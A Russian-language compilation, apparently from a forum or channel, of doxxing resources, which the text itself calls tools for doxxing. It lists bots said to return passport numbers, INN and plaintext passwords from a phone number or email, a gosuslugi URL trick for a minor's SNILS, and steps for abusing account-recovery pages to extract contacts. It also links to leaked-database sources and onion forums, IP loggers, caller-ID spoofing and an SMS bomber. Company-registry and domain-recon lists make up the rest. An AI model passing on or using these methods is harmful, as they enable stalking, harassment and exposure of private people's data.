организацию в учредителях и руководителях
22. list-org.com (https://www.list-org.com/?search=fio) — найдет
предпринимателя, его госзакупки, дерево связей
23. odyssey-search.info (r) — персональные данные гражданина России,
автомобили, документы, адрес проживания, скоринг негатива, агрессивность,
посягательство на жизнь и свободу, преступления, наркотики и т.п.,
зарегистрироваться можно на имя любой существующий компании
24. elections.istra-da.ru — реестр кандидатов на выборы, есть более миллиона
человек, найдет судимости, дату рождения, место жительства и работы,
должность, образование и прочее
25. /se_court_ru — список ресурсов для поиска в судах России
26. /fullname — список ресурсов для поиска по ФИО гражданина любой страны
Инструменты:
1. translit.net — переведёт ФИО из кириллицы в латиницу и наоборот
Через URL
https://www.gosuslugi.ru/api/posobi...e=Имя&middleName=Фамилия&birthDate=ГГГГ- ММ- ДД — найдет СНИЛС гражданина до 18 лет, нужно знать дату рождения, замените ГГГГ- ММ-ДД на дату рождения, и Имя, Фамилия, Отчество
Поиск по ИНН юридических лиц России
1. @egrul_bot — даст базовую информацию
2. nalog.ru (https://service.nalog.ru/bi.do) — проверка блокировки
банковских счетов, выберите "Запрос о действующих решениях о приостановлении"
а в место БИК указажите "123456789" или "000000000"
3. declaration.rostrud.ru
(https://declaration.rostrud.ru/declaration/index) — нужно знать область,
покажет адрес организации, название должностей и их количество в месте с
индивидуальным номером рабочего места ещё и заключение эксперта
4. gks.ru (https://www.gks.ru/accounting_report) — предоставление данных
бухгалтерской отчетности
5. bo.nalog.ru — найдет организацию и полную информацию о ней включая финансы
6. smartsearchbot.com — бот, находит компании, статус и адрес, ФИО директора
и учредителей, бесплатный поиск не доступен для новых пользователей, всего 1
бесплатная попытка
7. rosstat.gov.ru (https://rosstat.gov.ru/accounting_report) —
предоставление данных бухгалтерской отчетности
8. proverki.gov.ru (https://proverki.gov.ru/portal) — прокурорские
проверки, найдет адрес объекта, основания проведения проверки и тип места
9. basis.myseldon.com (r) — найдет досье на организацию, выручку, связи,
торговая деятельность, проверки, лицензии, арбитраж, контракты, дочерние
организации, патенты и многое другое
10. fek.ru — найдет документы, финансы, проверки и базовую информацию
11. list-org.com — найдет финансы, графы связей, e-mail и телефоны указанные
при регистрации, госзакупки, арбитраж, сертификаты, руководитель и реквизиты
12. checko.ru — реквизиты, уставной капитал, история изменений, связи,
руководители учредители компании и прочее
13. egrul.nalog.ru (https://egrul.nalog.ru/index.html) — выдаст актуальную
выписку из гос реестра на 6 страниц, с адресами, капиталом, ФИО и т.д.
14. odyssey-search.info (r) — находит адреса проживания, права, ФИО,
документы, доходы, должности, телефоны, контакты, транспортные карты,
автомобили, вылает отчёт на 50 страниц, а при регистрации можно указать любую
российскую организацию
15. declaration.rostrud.gov.ru
(https://declaration.rostrud.gov.ru/declaration/index) — найдет должности,
число работников, адрес
16. e-disclosure.ru — найдет события компании, маркетинговые решения,
бенефициаров, счета, оценку конкурентов и прочее
17. find-org.com — даст сообщения вестника гос.регистрации, контакты, историю
смены руководителей, финансовую отчетность и арбитраж
Восстановление доступа
1. esia.gosuslugi.ru (https://esia.gosuslugi.ru/recovery/) — даст часть адреса почты и номера телефона
Базы данных
├ @MyGenisBot — найдет имя и фамилию владельца номера
├ @phone_avito_bot — найдет аккаунт на Авито
├ @SafeCallsBot — бесплатные анонимные звонки на любой номер телефона с
подменой Caller ID
Ресурсы для пробива
• Lampyre (https://account.lampyre.io/email-and-phone-lookup) — веб
версия поиска по любому номеру телефона, поиск по аккаунтам и телефонной книге
• @mnp_bot
• @xinitbot
• @black_triangle_tg 3. Лицо
L Поиск лицу
[!] Содержимое раздела:
• FindTwin face search demo + @VkUrlBot (бот подобие сайта)—
https://findclone.ru/
• Face search • PimEyes — https://pimeyes.com/en/
• Betaface free online demo — Face recognition, Face search, Face analysis —
http://betaface.com/demo_old.html
• VK.watch – история профилей ВКонтакте — https://vk.watch/
4. Поисковые системы
L Поисковые Cистемы Людей:
[!] Содержимое раздела:
• https://www.peekyou.com/
• https://pipl.com/
• https://thatsthem.com/
• https://hunter.io/
• https://www.beenverified.com/
5. Ip-адрес.
L Проверка айпи адресов:
[!] Содержимое раздела:
• https://whatismyipaddress.com/
• http://www.ipaddresslocation.org/
• https://lookup.icann.org/
• https://www.hashemian.com/whoami/
Поиск по EMAIL:
Дополнения:
====================================================================================================================================================
https://t.me/HowToFind - помогает найти информацию по известным данным.
Очень мощная штука.
https://t.me/InstaBot - скачивает фото, видео, аватарки, истории из
Instagram
https://t.me/VKUserInfo_bot - Удобный способ спарсить открытую информацию
аккаунта ВК по id
https://t.me/InfoVkUser_bot - позволяет провести анализ друзей профиля и
выдает город + ВУЗ
https://t.me/Smart_SearchBot - поиск информации по номеру телефона
https://t.me/egrul_bot - сведения о государственной регистрации юрлиц и ИП
https://t.me/buzzim_alerts_bot - бот для мониторинга открытых каналов и
групп в Telegram
https://t.me/callcoinbot - звонилка
https://t.me/TempGMailBot - выдает временный адрес [домен: ....gmail.com]
https://t.me/DropmailBot - выдает временный адрес [домен: ....laste.ml]
https://t.me/fakemailbot - выдает временный адрес [домен: ....hi2.in]
https://t.me/etlgr_bot - временые адреса c возможностью повторного
использования и отправки сообщений.
https://t.me/remindmemegabot - хорошая напоминалка
https://t.me/MoneyPieBot - поможет не забыть о ваших долгах
You can contact @SmsBomberTelegram_bot right away.
t.me
Support бота: @SayanaroB0y (Писать по делу/рекламе)
t.me
====================================================================================================================================================
@Smart_SearchBot - Помогает найти дополнительную информацию, относительно
телефонного номера, id ВКонтакте, email, или ИНН юр./физ. лица.
@Getcontact_Officalbot – показывает как номер телефона записан в контактах
других людей
@info_baza_bot – база данных номеров телефона, email
@get_caller_bot - Ищет только по номеру телефона. На выходе: ФИО, дата
рождения, почта и «ВКонтакте»
@OpenDataUABot – по коду ЕДРПОУ возвращает данные о компании из реестра, по
ФИО — наличие регистрации ФОП
@YouControlBot - полное досье на каждую компанию Украины
@mailseatchbot - По запросу пробива e-mail выдает открытый пароль от ящика
если тот есть в базе
@Dosie_Bot – создатели «Досье» пошли дальше и по номеру телефона отдают ИНН и
номер паспорта
└ Установите расширение для браузера VKopt скачав здесь - https://vkopt.net/download/
Дополнения:
====================================================================================================================================================
@Smart_SearchBot - Помогает найти дополнительную информацию, относительно
телефонного номера, id ВКонтакте, email, или ИНН юр./физ. лица.
Как найти аккаунт в ВК зная e-mail адрес от Яндекса
1. Уберите из адреса почты @yandex.ru, у вас останется логин
2. Вставьте логин в ссылку https://music.yandex.com/users/LOGIN и перейдите
по ссылке
3. Если аккаунт нашелся, то откройте исходный код страницы (Ctrl+U)
4. Откройте поиск по странице (Ctrl+F) и введите туда vk.com
Работает не со всеми аккаунтами и игнорируйте ссылку на страницу VK Яндекс
Музыки!
Как по адресу Яндекс почты найти отзывы на картах Яндекса
ОЧЕНЬ ХОРОШИЙ САЙТ, КОТОРЫЙ СОДЕРЖИТ ТОННЫ И ТОННЫ ДОКСИНГОВЫХ ИНСТРУМЕНТОВ https://cybertoolbank.cc p.s про него мало кто знает (на английском)
Три самых ахуенных сайта через которые ты можешь дальше развиваться в данной
сфере:
https://xss.is/
http://**********/
https://rutor[.]wtf
https://spyse.com/ — поисковая система по кибербезопасности для получения технической информации, которая обычно используется некоторыми хакерами в киберразведке.
Как найти аккаунт в ВК зная e-mail адрес от Яндекса
1. Уберите из адреса почты @yandex.ru, у вас останется логин
2. Вставьте логин в ссылку https://music.yandex.com/users/LOGIN и перейдите
по ссылке
3. Если аккаунт нашелся, то откройте исходный код страницы (Ctrl+U)
4. Откройте поиск по странице (Ctrl+F) и введите туда vk.com
Поиск контрагента
https://service.nalog.ru/zd.do - Сведения о юридических лицах, имеющих
задолженность по уплате налогов и/или не представляющих налоговую отчетность
более года
https://service.nalog.ru/addrfind.do - Адреса, указанные при государственной
регистрации в качестве места нахождения несколькими юридическими лицами
https://service.nalog.ru/uwsfind.do - Сведения о юридических лицах и
индивидуальных предпринимателях, в отношении которых представлены документы
для государственной регистрации
https://service.nalog.ru/disqualified.do - Поиск сведений в реестре
дисквалифицированных лиц
https://service.nalog.ru/disfind.do - Юридические лица, в состав
исполнительных органов которых входят дисквалифицированные лица
https://service.nalog.ru/svl.do - Сведения о лицах, в отношении которых факт
невозможности участия (осуществления руководства) в организации установлен
(подтвержден) в судебном порядке
https://service.nalog.ru/mru.do - Сведения о физических лицах, являющихся
руководителями или учредителями (участниками) нескольких юридических лиц
https://fedresurs.ru/ - Единый федеральный реестр юридически значимых сведений о фактах деятельности юридических лиц, индивидуальных предпринимателей и иных субъектов экономической деятельности
http://rkn.gov.ru/mass-communications/reestr/ – реестры Госкомнадзора.
http://www.chinacheckup.com/ – лучший платный ресурс по оперативной и
достоверной верификации китайских компаний.
http://www.dnb.com/products.html - модернизированный ресурс одной из лучших в
мире компаний в сфере бизнес-информации Dun and Bradstreet.
http://www.imena.ua/blog/ukraine-database/ – 140+ общедоступных электронных
баз данных Украины.
http://www.fciit.ru/ – eдиная информационная система нотариата России.
http://gradoteka.ru/ – удобный сервис статистической информации по городам РФ.
http://www.egrul.ru/ - сервис по поиску сведений о компаниях и директорах из
государственных реестров юридических лиц России и 150 стран мира.
http://disclosure.skrin.ru - уполномоченное ФСФР (Федеральной службой по
финансовым рынкам) на раскрытие информации на рынке ценных бумаг агентство ЗАО
“СКРИН”.
http://1prime.ru/docs/product/disclosure.html – уполномоченное ФСФР
(Федеральной службой по финансовым рынкам) на раскрытие информации на рынке
ценных бумаг агентство ЗАО “Прайм-ТАСС”.
https://www.cbr.ru/ - информация ЦБ по бюро кредитных историй, внесенных в
государственный реестр.
http://www.gks.ru/accounting_report – предоставление данных бухгалтерской
отчетности по запросам пользователей от Федеральной службы государственной
статистики.
http://www.tks.ru/db/ – таможенные онлайн базы данных.
http://tipodop.ru/ - очередной каталог предприятий, организаций в России.
http://www.catalogfactory.org/ – организации России – финансовые результаты,
справочные данные и отзывы. Данные в настоящее время доступны по 4,8
млн.организаций.
http://pravo.ru/ – справочно-информационная система, включающая в настоящее
время 40 млн. законодательных, нормативных и поднормативных актов Российской
Федерации.
http://azstatus.ru/ – информационная база данных, в которой содержится
информация обо всех предпринимателях Российской Федерации, а также информация
о российских компаниях (юридические лица). Всего в справочнике более 10
миллионов записей.
http://seldon.ru/ – информационно-аналитическая система, значительно
упрощающая и систематизирующая работу с закупками.
http://www.reestrtpprf.ru/ – реестр надежных партнеров от системы Торгово-
промышленных палат в Российской Федерации.
http://iskr-a.com/ – сообщество безопасников и платформа для информационного
взаимодействия в одном флаконе.
http://www.ruscentr.com/ - реестр базовых организаций российской экономики,
добросовестных поставщиков и бюджетоэффективных заказчиков (организаций).
https://www.aips-ariadna.com/ – антикриминальная онлайн система учета по
России и СНГ. Относится к тому же ценовому сегменту, что и «Контур Фокус» и
т.п., и отличается от других систем большим уклоном в судебные и
правоохранительные данные. Ориентирована прежде всего на службу безопасности.
правоохранительные данные. Ориентирована прежде всего на службу безопасности.
http://188.254.71.82/rds_ts_pub/ – единый реестр зарегистрированных деклараций
РФ.
http://croinform.ru/index.php?page=index – сервис проверки клиентов,
конкурентов, партнеров и контрагентов в режиме реального времени 24/7, в т.ч.
со смартфона. Цены вполне человеческие. Сервис знаменитого Кроноса.
http://www.zakupki.gov.ru/epz/main/public/home.html – официальный сайт
Российской Федерации для размещения информации о размещении заказов на
поставки товаров, выполнение работ, оказание услуг.
http://rostender.info/ – ежедневная рассылка новых тендеров в соответствии с
отраслевыми и региональными настройками.
http://pravo.fso.gov.ru/ – государственная система правовой информации.
Позволяет быть в курсе всех новых правовых актов. Имеет удобный поисковик.
http://www.bicotender.ru/ - самая полная поисковая система тендеров и закупок
по России и странам СНГ.
http://sophist.hse.ru/ – единый архив экономических и социологических данных
по российской Федерации от НИУ ВШЭ.
http://www.tenderguru.ru/ – национальный тендерный портал, представляет собой
единую базу государственных и коммерческих тендеров с ежедневной рассылкой
анонсов по объявленным тендерам.
http://www.moscowbase.ru/ - поддерживаемые в состоянии постоянной актуальности
адресно-телефонные базы данных по компаниям Москвы и России. Уникальным
продуктом компании являются базы данных новых компаний, появившихся в течение
двух последних кварталов. В данные включается вся стандартная информация,
предоставляемая платными онлайн базами, плюс актуальные внутренние телефоны и
e-mail.
http://www.credinform.ru/ru-RU/globas - информационно-аналитическая система
ГЛОБАС – I содержит данные о семи миллионах компаний. Предназначена для
комплексной информационной поддержке бизнеса и создания комплексных
аналитических отчетов.
http://www.actinfo.ru/ – отраслевой бизнес-справочник предприятий России по их
актуальным почтовым адресам и контактным телефонам. Единственный справочник,
который включает контактные данные по предприятиям, созданным в предыдущем
квартале.
http://www.sudrf.ru/ -государственная автоматизированная система РФ
«Правосудие».
http://docs.pravo.ru/ – справочно-правовая система Право.ру. Предоставляет
полный доступ к нормативным документам любых субъектов Российской Федерации, а
также к судебной практике арбитражных судов и мнениям экспертов любых
юридических областей. Ежемесячная плата для работы с полной базой документов
составляет 500 руб.
http://www.egrul.com/ – платные и бесплатные сервисы поиска по ЕГРЮЛ, ЕГРИП,
ФИО, балансам предприятий и др. параметрам. Одно из лучших соотношений цены и
качества.
http://www.fedresurs.ru/ – единый федеральный реестр сведений о фактах
деятельности юридических лиц.
http://www.findsmi.ru/ – бесплатный сервис поиска данных по 65 тыс.
региональных СМИ.
http://hub.opengovdata.ru/ – хаб, содержащий открытые государственные данные
всех уровней, всех направлений. Проект Ивана Бегтина.
http://www.ruward.ru/ – ресурс агрегатор всех рейтингов Рунета. В настоящее
время уже содержит 46 рейтингов и более 1000 компаний из web и PR индустрии.
http://www.b2b-energo.ru/firm_dossier/ - информационно-аналитическая и
торгово-операционная система рынка продукции, услуг и технологий для
электроэнергетики.
http://opengovdata.ru/ – открытые базы данных государственных ресурсов
http://bir.1prime.ru/ – информационно-аналитическая система «Бир-аналитик»
позволяет осуществлять поиск данных и проводить комплексный анализ по всем
хозяйствующим субъектам России, включая компании, кредитные организации,
страховые общества, регионы и города.
http://www.prima-inform.ru/ – прямой доступ к платным и бесплатным
информационным ресурсам различных, в т.ч. контролирующих организаций.
Позволяет получать документы и сводные отчеты, информацию о российских
компаниях, индивидуальных предпринимателях и физических лицах, сведения из
контролирующих организаций. Позволяет проверять субъектов на аффилированность
и многое другое.
http://www.integrum.ru/ –портал для конкурентной разведки с самым
дружественным интерфейсом. Содержит максимум информации, различных баз данных,
инструментов мониторинга и аналитики. Позволяет компании в зависимости от ее
нужд, размеров и бюджета выбирать режим пользования порталом.
www.spark-interfax.ru – портал обладает необходимой для потребностей
конкурентной разведки полнотой баз данных, развитым функционалом, постоянно
добавляет новые сервисы.
https://fira.ru/ – молодой быстроразвивающийся проект, располагает полной и
оперативной базой данных предприятий, организаций и регионов. Имеет
конкурентные цены.
www.skrin.ru – портал информации об эмитентах ценных бумаг. Наряду с
обязательной информацией об эмитентах содержит базы обзоров предприятий,
отраслей, отчетность по стандартам РБУ, ГААП, ИАС. ЗАО “СКРИН” является
организацией, уполномоченной ФСФР.
http://www.magelan.pro/ – портал по тендерам, электронным аукционам и
коммерческим закупкам. Включает в себя качественный поисковик по данной
предметной сфере.
http://www.kontragent.info/ – ресурс предоставляет информацию о реквизитах
контрагентов и реквизитах, соответствующих ведению бизнеса.
http://www.ist-budget.ru/ – веб-сервис по всем тендерам, госзаказам и
госзакупкам России. Включает бесплатный поисковик по полной базе тендеров, а
также недорогой платный сервис, включающий поиск с использованием расширенных
фильтров, по тематическим каталогам. Кроме того, пользователи портала могут
получать аналитические отчеты по заказчикам и поставщикам по тендерам. Есть и
система прогнозирования возможных победителей тендеров.
http://www.vuve.su/ - портал информации об организациях, предприятиях и
компаниях, ведущих свою деятельность в России и на территории СНГ. На
сегодняшний день база портала содержит сведения о более чем 1 млн.
организаций.
http://www.disclosure.ru/index.shtml - система раскрытия информации на рынке
ценных бумаг Российской Федерации. Включает отчетность эмитентов, существенные
новости, отраслевые обзоры и анализ тенденций.
http://www.mosstat.ru/index.html – бесплатные и платные онлайн базы данных и
сервисы по ЕГРПО и ЕГРЮЛ Москвы и России, а также бухгалтерские балансы с 2005
года по настоящее время. По платным базам самые низкие тарифы в Рунете.
Хорошая навигация, удобная оплата, качественная и оперативная работа.
http://www.torg94.ru/ – качественный оперативный и полезный ресурс по
госзакупкам, электронным торгам и госзаказам.
http://www.k-agent.ru/ – база данных «Контрагент». Состоит из карточек
компаний, связанных с ними документов, списков аффилированных лиц и
годовых бухгалтерских отчетов. Документы по компаниям представлены с 2006 г.
Цена в месяц 900 руб. Запрашивать данные можно на сколь угодно много компаний.
http://www.is-zakupki.ru/ – информационная система государственных и
коммерческих закупок. В системе собрана наиболее полная информация по
государственным, муниципальным и коммерческим закупкам по всей территории РФ.
Очень удобна в работе, имеет много дополнительных сервисов и, что приятно,
абсолютно разумные, доступные даже для малого бизнеса цены.
http://salespring.ru/ – открытая пополняемая база данных деловых контактов
предприятий России и СНГ и их сотрудников. Функционирует как своеобразная
биржа контактов.
www.multistat.ru – многофункциональный статистический портал. Официальный
портал ГМЦ Росстата.
http://sanstv.ru/photomap/ (поиск фото по геометкам в соц. сетях)
1. https://regvk.com - узнать цифровой ID человека ВКонтакте.
2. https://rusfinder.pro/vk/user/id********* (здесь цифровой ID) - узнать
данные указанные при регистрации аккаунта ВКонтакте.
Если ничего старого нет, обновите страницу и быстро делайте скрин области. С
новорегами не работает.
3. http://archive.fo - просмотреть web-архив страницы. Редко помогает.
4. https://220vk.com - посмотреть скрытых друзей пользователя ВКонтакте.
Работает только со старыми страницами, закрытые профили не чекает.
5. Ошибка
Общий поиск по соц. сетям, большой набор разных инструментов для поиска:
- http://osintframework.com/
https://findclone.ru/- Лучшая доступная технология распознавания лиц
(документация)
Поиск местоположения базовой станции сотового оператора:
[LIST]
[]http://unwiredlabs.com
[]http://xinit.ru/bs/
[/LIST]
Пробив по биткоин-кошельку
Уже не является секретом, что биткоин не так анонимен, как многие думают.
Баланс кошелька и все его переводы можно легко отследить. Именно для этого
привожу список некоторых сервисов, которые помогут нам в этом
1. Bitref — Проверка биткоин кошелька.
3. Cryptocurrency Alerting — Сервис, позволяющий настроить оповещения об
активности интересующего вас адреса.
4. Blockseer — Визуализация связей между адресами, участвовавшими в
осуществлении транзакций.
Поиск по номеру карты
1. bincheck.io
2. binchecker.com
4. freebinchecker.com
5. binlist.io
Поиск по физическому адресу Украины
1. spravnik.com — найдет номер телефона, ФИО
2. liveuamap.com — отмечены места из новостей с происшествиями,
преступностью, катаклизмами и еще 40 видов событий
3. map.land.gov.ua — кадастровая карта
4. /physical_address — список ресурсов для поиска по физическому адресу любой
страны
архив баз банков, сайтов, приложений
2. raidforums.com (r) — ссылки на скачивание разных баз с 1995 года
3. @basetelega (https://t.me/basetelega) — утечки, компании, парсинг открытых
источников
4. ebaza.pro (r) — есть email, телефонные номера, физ. лица, предприятия,
базы доменов и другие
5. xss.is
(http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/) —
список баз, 3,5B записей, 52 базы
6. hub.opengovdata.ru — Российские базы статистики, росстата, архивы сайтов,
финансы, индикаторы, федеральные органы власти, суды и т.д
7. @freedomf0x — утечки сайтов, приложений, гос. структур
8. @leaks_db — агрегатор публичных утечек
9. @BreachedData — утечки сайтов, приложений, соц. сетей, форумов и т.д.
10. @opendataleaks — дампы сайтов школ, судов, институтов, форумов по всему
миру
11. @fuckeddb — дампы сайтов, приложений, социальных сетей, школ, судов,
институтов, государственных ресурсов, форумов по всему миру
Как найти владельца сообщества VK
Через приложение
└ Откройте VKinfo(https://vk.com/app7183114) и впишите ссылку на сообщество
Через сайт
└ Откройте http://yzad.ru и дайте ссылку на паблик
Через документы
1. Откройте раздел документы в сообществе
2. Откройте исходный код страницы (Ctrl+U)
3. Откройте окно поиска(Ctrl+F)
4. В окне поиска введите имя файла которое есть в сообществе. В результатах
должна быть строка с именем файла, пример:
[["439837850","xls","OkiDoki.xls","806 КБ, 01 октбр 2020 в
17:59","-27921417",0,"","138633190",false,1,""]]
где OkiDoki.xls имя файла, а 138633190 ID пользователя загрузившего этот файл,
как правило это ID админа
Поиск телефона/почты родителей
.
Для того чтобы найти почту нам нужны хотя бы одна из этих вещей: Профиль ВК,
Профиль ОК, ФИ + ДР
Заметим, что не всегда получится вытащить, но у меня в большинстве случаев
получалось.
1. Идем на сайт восстановления пароля ok.ru
(https://m.ok.ru/dk?st.cmd=accountRecoverFeedbackForm) и достаем в некоторых
случаях часть почты и телефона. Если почту легко угадать - угадываем. Если
ничего не получилось - идем дальше
2. Идем в бота (https://t.me/ssb_russian_probiv_bot) и если профилю больше
5-6 лет и он был активен - то отправляем ссылку на вк ему. Выдаст почту и
телефон - чекает по базам ВК.
3. Последний способ это способ связанный с my.mail.ru . Для начала
регистрируемся в майл ру. Нажимаем на поиск людей
(https://my.mail.ru/my/search_people?) и вбиваем Фамилию Имя. Фильтруем и в
некоторых случаях получаем ссылку по типу my.mail.ru/домен/ник. Получается
почта ник@домен.ру
Поисковики во всем Интернете
Поиск осуществляется по любым данным
Clearnet
1. duckduckgo.com — есть операторы поиска
2. mojeek.com — есть фильтры по странам
3. baidu.com — китайская поисковая система
4. swisscows.com — семантическая поисковая система
5. aleph.occrp.org — поиск в базах данных, реестрах компаний, утечках, и
многом другом
6. opendirectory-finder (https://ewasion.github.io/opendirectory-finder/) —
поиск в Google с дорками
7. publicwww.com (r) — поиск по исходному коду страниц, есть поддержка
регулярных выражений
8. search.carrot2.org — визуализирует результаты в графы, чарты, есть
несколько источников данных
9. findpdfdoc.com — поиск в Google с фильтром по расширению файла
10. keywordtool.io (https://keywordtool.io/search/keywords/) — покажет какие
ключевые слова на запрос при поиске выдает Google, YouTube, Bing, Amazon.
eBay, Instagram, Twitter
11. millionshort.com — помогает убрать необходимое количество результатов из
топа выдачи поисковиков, есть фильтры по дате, стране и по домену
12. brightlocal.com (https://www.brightlocal.com/local-search-results-
checker/) — поиск в Google с локальным и языковым фильтром
13. trove.nla.gov.au (https://trove.nla.gov.au/search/category/websites) —
поиск в архиве веб страниц, фильтры по дате и типу документа
14. nationalarchives.gov.uk
(http://webarchive.nationalarchives.gov.uk/search/) — поиск в архиве веб
страниц, фильтры по году и типу документа
15. eresources.nlb.gov.sg (http://eresources.nlb.gov.sg/webarchives/landing-
page) — поиск в сингапурском веб архиве, фильтры по году, типу документа и
категории
16. webarchive.archive.unhcr.org
(https://webarchive.archive.unhcr.org/search) — поиск в веб архиве, фильтры по
дате, типу документа
17. tools.digitalmethods.net
(http://tools.digitalmethods.net/beta/scrapeGoogle/autocomplete.php) — покажет
какие фразы предлагает Google по запросу, есть фильтры по стране и языку
Tor/Onion
1. FreshOnions
(http://freshonifyfe4rmuh6qwpsexfhdrww7wnt5qmkoertwxmcuvm4woo4ad.onion/)2.
DarkSearch
(https://darksearch.io/)3. onionsearchengine.com
4. dargle.net (http://www.dargle.net/search) — поиск в заголовках onion-
сайтов
5. ahmia.fi
6. zorexeye.com (http://zorexeye.com/s/darkweb/) — перенаправляет запрос на
21 поисковую систему, иногда работает только через VPN
7. darktracer.com (r)
I2P
1. darktracer.com (r)
Парсеры
1. googler (https://github.com/jarun/googler) (t) — сохранит результаты выдачи Google в файл, поддерживает дорк
xinit.ru
Поиск по номеру трекера
Трекеры это инструмент сбора данных о пользователях для аналитики. Используются на сайтах и в приложениях. Каждый трекер имеет свой уникальный номер который укзан в исходном коде веб страницы. Пример: UA-123456789 — трекер Google Analytics.
1. shodan.io — найдет IP адреса и сайты с упоминанием кода трекера
2. spyonweb.com — найдет сайты с искомым трекером UA. pub
3. intelx.io (https://intelx.io/tools?tab=analytics) — найдет сайты с искомым
трекером UA, 6 источников поиска
4. analyzeid.com — принимает трекеры pub, UA, ищет другие сайты
5. osint.sh (https://osint.sh/analytics/) — найдет сайты с искомым трекером
UA
6. osint.sh (https://osint.sh/adsense/) — найдет сайты с искомым трекером pub
Поиск по любому домену
1. xinit.ru (https://xinit.ru/whois/) — найдет whois, DNS-записи, даст ссылки
на поисковые ресурсы
2. hunter.io — дает email адреса
3. @WhoisDomBot — узнайте базовую информацию о домене
4. riskiq.com (r) — автоматизированный поиск по всем фронтам
5. Knock Subdomain Scan (https://github.com/guelfoweb/knock) (t) — находит
под домены и FTP
6. builtwith.com — технологический профиль сайта, взаимосвязи между сайтами
7. crimeflare.org (http://www.crimeflare.org:82/cfs.html) — определяет
настоящий IP адрес сайта скрытый за CloudFlare
8. cyber-hub.net (https://cyber-hub.net/domain_resolver.php) — распознаватель
cloudflare, статус DNS, перебор под доменов и многое другое
9. suip.biz (https://suip.biz/ru/?act=amass) — найдет поддомены
10. urlscan.io — сервис для сканирования и анализа сайтов
11. dnsdumpster.com — обнаруживает хосты связанные с доменом
12. censys.io — находит какие серверы и устройства выставлены в сети
13. virustotal.com — служба пассивного DNS, поиск под доменов, найдет whois и
историю сертификатов SSL
14. atsameip.intercode.ca — одинаковые IP у сайта, можно узнать под домены
15. spiderfoot.net (r) — автоматический поиск с использованием огромного
количества методов, можно использовать в облаке если пройти регистрацию
16. dirhunt (https://github.com/Nekmo/dirhunt) (t) — поиск директорий сайта
без брута
17. Amass (https://github.com/OWASP/Amass) (t) — сетевое картирование
поверхностей атаки и обнаружение внешних ресурсов с использованием методов
сбора информации с открытым исходным кодом и активных методов разведки
18. Photon (https://github.com/s0md3v/Photon) (t) — найдет на сайте файлы,
секретные ключи, JS файлы, URL с параметрами
19. spyse.com (https://spyse.com/search/subdomain) — поиск поддоменов
20. www.cookieserve.com — анализ cookies сайта, покажет какому сайту
принадлежат
21. dnslytics.com (https://dnslytics.com/reverse-analytics) — вытаскивает
трекеры из сайта
22. domainwat.ch — может искать информацию такую как имя регистранта, адрес,
номер телефона, адрес электронной почты из информации WHOIS и историю
изменений
23. findomain (https://github.com/Edu4rdSHL/findomain) (t) — найдет под
домены
24. shodan.io — найдет IP адреса и сайты с упоминанием искомого сайта
25. phonebook.cz — найдет email, под домены, директории сайта
26. visualsitemapper.com (http://www.visualsitemapper.com/) — визуализация
карты сайта одним графиком
27. dorks.faisalahmed.me — составляет дорки для Google и Яндекс
28. synapsint.com — хорошо ищет поддомены
29. analyzeid.com — находит на странице идентификаторы аналитики и по ним
ищет другие сайты
30. FavFreak (https://github.com/devanshbatham/FavFreak) (t) — находит все
сайты схожим favicon
31. completedns.com (https://completedns.com/dns-history/) — история DNS
32. pidrila (https://github.com/enemy-submarine/pidrila) (t) — находит
директории сайта
33. osint.sh — поддомены, история DNS, сканер NMAP и много другого
34. mmhdan.herokuapp.com — вычислит хеш значка сайта и даст ссылки на ресурсы
где можно найти похожие сайты с одинаковыми значками
35. o365chk (https://github.com/nixintel/o365chk/) (t) — проверит наличие у
сайта Microsoft Office365, выдаст email, облачное имя и ссылку для в хода в
офис
36. pagexray.fouanalytics.com — найдет к каким сайтам делаются запросы для
трекинга и аналитики, делает скриншот сайта
37. metagoofil (https://github.com/laramies/metagoofil) (t) — найдет
метаданные во всех документах на сайте
38. www.email-format.com (https://www.email-format.com/i/search/) — даст
email, дату их обнаружения и источник
39. tools.whoisxmlapi.com (https://tools.whoisxmlapi.com/whois-history-
search) — найдет всю историю изменений whois домена
40. www.link-assistant.com (https://www.link-assistant.com/seo-spyglass/free-
backlink-checker-tool.html) — найдет источники упоминания домена и их анализ
41. talosintelligence.com (https://talosintelligence.com/reputation_center/)
— покажет сколько писем было отправлено с домена и его репутацию
42. account.lampyre.io (t) (r) — программа выполняет поиск малварей, под
доменов, файлов, компании и их работников, whois, email адреса
43. leak-lookup.com (https://leak-lookup.com/search) (r) — покажет на каких
сайтах была утечка с искомым доменом
44. app.netlas.io (r) — субдомены, устройства, IP адреса, CVE и уязвимости
45. ⚡️@UniversalSearchBot — даст прямые ссылки на 50+ ресурсов где есть
история Whois, IP, DNS, Nameserver, сертификаты, трекеры, похожие домены,
контакты, архивы, дорки и прочее
Поиск по серийному номеру техники
1. warrantycheck.epson.eu — техника бренда Epson, даст номер модели, номер
материала
2. dysonseriallookup.com (http://dysonseriallookup.com/BedBathBeyond) —
техника бренда Dyson, даст дату поставки и продавца
3. wwwp.medtronic.com
(http://wwwp.medtronic.com/productperformance/serialLookup.html?serialNumber)
— техника бренда Medtronic, выдает модель и тип медицинского оборудования
4. www.bobswatches.com (https://www.bobswatches.com/rolex-serial-numbers) —
по серийному номеру часов Rolex выдает год производства
5. pcsupport.lenovo.com (https://pcsupport.lenovo.com/us/en/warrantylookup#/)
— техника бренда Lenovo, выдает модель, а если залогиниться то и информацию о
гарантии
6. www.imei.info (https://www.imei.info/apple-sn-check/) — техника бренда
Apple, выдет модель, цвет, объем накопителя, время изготовления, место
производства
7. www.vega.com (https://www.vega.com/en/products/serialnumber-search) —
техника бренда Vega, различные датчики и системы контроля систем
водоснабжения, отопления и прочего связанного с ЖКХ, даст подробную информацию
о модели, дате поставки и дате тестирования
[~]reg.ru - поиск информации по сайту.
[~]Grabify.link - айпи логгер
[~]РЕКЛАМА.ru - второй айпи логгер
[~]@reverseSearch2Bot - находит соц сети по фото
[~]@EyeGodsBot - находит инфу по айпи номеру лицу и тд.
[~]@Smart_SearchBot - второй бот по нахождению инфы
[~]FTH.SU? - Поиск информации по никнейму/IP/Почте.
[~]220vk.com - Просмотр информации о друзьях, странице и т.д.
[~]Findclone.ru - Нахождение страниц по фотографиям.
[~]nomer.io ? - Просмотр информации по номеру телефона.
[~]CheckHost.net? - Просмотр информация по IP-адресу.
[~]NotePad++ - Текстовый редактор для записи найденной информации.
[~]phoneradar.ru - Аналог nomer.io.
[~]GetContact - Программа для определения ФИО по номеру телефона.
[~]archive.is - Сохранение страницы.
[~]vk.com/app7183114_-147591239 - Просмотр информации о странице.
[~]Leakcheck - Проверка паролей от почт.
[~]yzad.ru — Находит владельца группы
